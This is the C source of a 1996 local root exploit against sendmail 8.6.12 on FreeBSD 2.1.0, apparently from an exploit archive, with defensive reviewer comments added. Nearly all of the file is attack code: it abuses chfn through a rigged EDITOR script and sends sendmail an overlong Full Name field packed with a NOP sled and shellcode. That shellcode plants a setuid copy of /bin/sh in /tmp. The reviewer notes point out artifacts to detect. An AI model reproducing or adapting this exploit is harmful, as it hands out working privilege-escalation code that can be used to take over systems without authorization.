/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / sendmail / freebsdmail.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  2KB  |  66 lines

  1. /*                               Hi !                                       */
  2. /* This is exploit for sendmail bug (version 8.6.12 for FreeBSD 2.1.0).     */
  3. /* If you have any problems with it, send letter to me.                     */
  4. /*                             Have fun !                                 */
  5. /* -----------------   Dedicated to my beautiful lady   ------------------  */
  6. /* Leshka Zakharoff, 1996. E-mail: leshka@chci.chuvashia.su              */
  7.  
  8. #include <stdio.h>
  /*
   * Entry point. Calls make_files() to write "user.inf" and "hack" into the
   * current directory, then hands one command line to the shell via system():
   * set and export EDITOR=./hack, make hack executable, run chfn, run
   * /usr/sbin/sendmail, and print a pointer to /tmp.
   *
   * Reviewer notes:
   *  - chfn is started with EDITOR pointing at a relative-path script, so
   *    presumably chfn runs ./hack where it would normally open an interactive
   *    editor -- confirm against the chfn in use. A chfn process spawning a
   *    script from the working directory, followed by a local sendmail run,
   *    is the process chain to look for in audit logs.
   *  - main() has no return type and system() is used without <stdlib.h>
   *    (only <stdio.h> is included above); this is pre-ANSI style.
   */
  9. main()
  10. {
  11.   void make_files();
  12.   make_files();
        /* NOTE(review): the string literal below contains a raw line break
           between the two listing lines, which standard C does not accept;
           only compilers with the old multi-line-string extension take it. */
  13.   system("EDITOR=./hack;export EDITOR;chmod +x hack;chfn;/usr/sbin/sendmail;
  14.          echo See result in /tmp");
  15. }
  16.  
  /*
   * Writes the two helper files used by main() into the current directory:
   *
   *   user.inf - text laid out like the form chfn presents, whose "Full Name"
   *              field is a run of 0x90 bytes followed by code_string.
   *   hack     - a two-line shell script that copies user.inf over the file
   *              named by its first argument and then sets that file's
   *              timestamp with touch -t.
   *
   * Takes no arguments and returns nothing; the fopen() results are used
   * without a NULL check.
   *
   * Reviewer notes (defensive reading):
   *  - The Full Name value is far longer than a real name and consists mostly
   *    of non-printable bytes. Per the file header the consumer is sendmail
   *    8.6.12 on FreeBSD 2.1.0; presumably it copies this field into a
   *    fixed-size buffer without a length check -- confirm against that
   *    sendmail source. A length and character-set check where the field is
   *    accepted or consumed would reject this input.
   *  - The byte string embeds absolute addresses (0xefbfcf70, 0x80477d0 and the
   *    trailing a0 cf bf ef, i.e. 0xefbfcfa0 in little-endian order). These are
   *    presumably tied to one specific binary and stack layout; verify before
   *    assuming the file applies to any other build.
   *  - The embedded command text copies /bin/sh to /tmp and applies mode
   *    a=rsx to /tmp/sh. A set-id copy of a shell under /tmp, and stray
   *    "user.inf" / "hack" files, are the on-disk artifacts to check for.
   */
  17. void make_files()
  18. {
  19.   int i,j;
  20.   FILE *f;
  21.   char nop_string[200];
  22.   char code_string[]=
  23.     {
  24.       "\xeb\x50"                         /* jmp    cont */
  25.       /* geteip: */
  26.       "\x5d"                             /* popl   %ebp */
  27.       "\x55"                             /* pushl  %ebp */
  28.       "\xff\x8d\xc3\xff\xff\xff"         /* decl   0xffffffc3(%ebp) */
  29.       "\xff\x8d\xd7\xff\xff\xff"         /* decl   0xffffffd7(%ebp) */
  30.       "\xc3"                             /* ret */
          /* The two decl instructions above address the bytes labelled
             0xffffffc3 and 0xffffffd7 below (0x3c and 0x01). Presumably they
             turn them into ';' and a terminating NUL at run time, so the
             stored text contains no NUL byte and survives the %s write. */
  31.       /* 0xffffffb4(%ebp): */ "cp /bin/sh /tmp"
  32.       /* 0xffffffc3(%ebp): */ "\x3c"
  33.       "chmod a=rsx /tmp/sh"              /* 0xffffffd7(%ebp): */
  34.       "\x01"
  35.       "-leshka-leshka-leshka-leshka-"    /* reserved */
  36.       /* cont:  */
  37.       "\xc7\xc4\x70\xcf\xbf\xef"         /* movl   $0xefbfcf70,%esp */
  38.       "\xe8\xa5\xff\xff\xff"             /* call   geteip */
  39.       "\x81\xc5\xb4\xff\xff\xff"         /* addl   $0xffffffb4,%ebp (immediate is little-endian b4 ff ff ff) */
  40.       "\x55"                             /* pushl  %ebp */
  41.       "\x55"                             /* pushl  %ebp */
  42.       "\x68\xd0\x77\x04\x08"             /* pushl  $0x80477d0 */
  43.       "\xc3"                             /* ret */
  44.       "-leshka-leshka-leshka-leshka-"    /* reserved */
  45.       "\xa0\xcf\xbf\xef"                 /* 0xefbfcfa0, little-endian; role not stated in the source */
  46.     };
  47.  
        /* Pad so that padding plus code_string (sizeof counts the terminating
           NUL) adds up to 269; the padding is written as 0x90 bytes and then
           NUL-terminated so it can be printed with %s. */
  48.   j=269-sizeof(code_string);
  49.   for(i=0;i<j;nop_string[i++]='\x90');
  50.   nop_string[j]='\0';
  51.  
        /* user.inf: every field is ordinary except Full Name, which carries
           the padding and the byte string. */
  52.   f=fopen("user.inf","w");
  53.   fprintf(f,"#Changing user database information for leshka\n");
  54.   fprintf(f,"Shell: /usr/local/bin/bash\n");
  55.   fprintf(f,"Location: \n");
  56.   fprintf(f,"Office Phone: \n");
  57.   fprintf(f,"Home Phone: \n");
  58.   fprintf(f,"Full Name: %s%s\n",nop_string,code_string);
  59.   fclose(f);
  60.  
        /* hack: the script main() installs as EDITOR. It overwrites "$1" with
           user.inf and sets a fixed timestamp on it; the reason for the
           timestamp is not visible here -- presumably so the caller treats
           the file as edited. */
  61.   f=fopen("hack","w");
  62.   fprintf(f,"cat user.inf>\"$1\"\n");
  63.   fprintf(f,"touch -t 2510711313 \"$1\"\n");
  64.   fclose(f);
  65. }
  66. /*                    www.hack.co.za              [2000]*/